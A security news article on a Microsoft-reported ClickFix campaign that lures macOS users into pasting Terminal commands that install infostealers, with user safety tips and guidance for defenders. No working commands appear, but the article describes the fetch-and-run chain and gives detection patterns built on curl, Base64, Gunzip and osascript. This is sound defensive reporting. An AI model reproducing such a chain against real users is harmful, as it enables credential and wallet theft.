ClickFix attacks target macOS users with fake disk cleanup guides and utility lures

A new ClickFix campaign is targeting macOS users with fake disk cleanup guides, troubleshooting posts, and system utility pages. Microsoft says the attackers trick users into copying commands into Terminal, where the commands download and run infostealing malware.

The lures appear on platforms such as Medium, Craft, Squarespace-hosted pages, and standalone websites. They claim to help users fix common Mac problems, including low disk space, but the instructions install malware instead of repairing the device.

The campaign delivers macOS infostealers such as Macsync, Shub Stealer, and AMOS. Once active, the malware can steal browser credentials, Keychain entries, iCloud data, Telegram data, media files, documents, and cryptocurrency wallet information.

Why this ClickFix campaign matters

ClickFix attacks work because they make users run the infection command themselves. The page looks like a normal support article, and the command appears to be part of a quick fix.

This makes the campaign different from a traditional malicious app download. Instead of asking users to install a suspicious app bundle, the attackers tell them to paste a command into Terminal.

Microsoft says scripts launched directly through Terminal do not go through the same Gatekeeper checks that macOS applies to apps opened through Finder. That gives attackers a reliable path to execute malicious scripts when users follow the fake instructions.

At a glance

Detail	What Microsoft found
Attack type	ClickFix social engineering
Target	macOS users
Main lure	Fake disk cleanup, troubleshooting, and utility instructions
Observed platforms	Medium, Craft, Squarespace-hosted pages, and standalone websites
Malware families	Macsync, Shub Stealer, and AMOS
Data at risk	Passwords, Keychain data, iCloud data, browser cookies, files, Telegram data, and crypto wallets
Persistence methods	LaunchAgents, LaunchDaemons, fake Google Update components, and hidden helper files

How the fake macOS fixes work

The attack begins when a user finds a fake support page that promises to solve a Mac issue. The page may tell the user to open Terminal and paste a command to clean disk space or install a helpful utility.

After the command runs, it retrieves more code from attacker-controlled infrastructure. Microsoft observed command chains that use native tools such as curl, Base64, Gunzip, osascript, and shell interpreters.

Those scripts can fingerprint the Mac, check the keyboard locale, contact a command-and-control server, and download the next malware stage. In some cases, the malware avoids execution if it detects signs of analysis or certain regional settings.

Three campaign paths were observed

Microsoft grouped the activity into three execution paths: a loader install campaign, a script install campaign, and a helper install campaign. All three use fake user-facing instructions to start the infection.

The loader campaign downloads and runs AppleScript payloads, collects system details, and can install a fake Google Update component for persistence. The script campaign uses obfuscated AppleScript and can fall back to Telegram to locate command-and-control infrastructure.

The helper campaign downloads files named helper or update, then uses a hidden .mainhelper backdoor and .agent wrapper to maintain access. It can also install a LaunchDaemon so the backdoor starts again after reboot.

What the malware steals

• Saved browser usernames and passwords
• Browser cookies and profile data
• macOS Keychain databases
• iCloud account data
• Telegram data
• Documents, images, and other local files
• Cryptocurrency wallet files and browser wallet data
• Media files and notes
• SSH keys and other sensitive local credentials

Crypto wallet users face added risk

The malware does more than steal existing wallet files. Microsoft found cases where the attackers replaced legitimate cryptocurrency wallet apps with trojanized versions.

Wallet apps such as Ledger Live, Trezor Suite, and Exodus were targeted in the reported activity. A victim might continue using a fake replacement app without realizing that future transactions or wallet activity could be exposed.

This makes recovery harder. Users who suspect infection should not simply remove the malware and continue using the same wallet environment. They should move funds to new wallets created on a clean device.

Apple added protections, but users still need caution

Microsoft says Apple updated XProtect signatures for this threat. It also says macOS 26.4 and later added a warning that blocks potentially malicious commands pasted into Terminal.

Apple’s security documentation explains that macOS uses layered protections such as Gatekeeper, notarization, and XProtect to prevent, block, and remediate malware. Gatekeeper also checks apps downloaded from outside the App Store when users open them.

ClickFix tries to work around user trust rather than only technical controls. If a person ignores warnings and runs commands from a random webpage, attackers may still succeed.

How macOS users can stay safe

• Never paste commands from a webpage into Terminal unless you fully trust and understand the source.
• Use Apple’s official support pages or trusted vendor documentation for troubleshooting.
• Keep macOS updated so Terminal paste warnings and XProtect updates stay current.
• Do not enter your Mac password into prompts launched by unknown scripts or “cleanup” tools.
• Be suspicious of pages promising one-command fixes for disk space, performance, or hidden system errors.
• Check LaunchAgents and LaunchDaemons if you suspect persistence.
• Rotate passwords and revoke sessions if an infostealer may have run.
• Move cryptocurrency funds using a clean device and newly generated wallets.

What security teams should monitor

Organizations should watch for unusual Terminal activity, especially commands that combine curl with Base64, Gunzip, osascript, dscl, or shell execution. Those patterns can indicate a ClickFix infection chain.

Security teams should also monitor for suspicious LaunchAgent and LaunchDaemon creation, fake Google Update paths, compressed archives in temporary folders, and outbound HTTP POST activity to unfamiliar domains.

Microsoft also recommends user education, endpoint detection, cloud-delivered protection, tamper protection, and monitoring for unauthorized access to browser data, Keychain items, SSH keys, and cloud credentials.

FAQ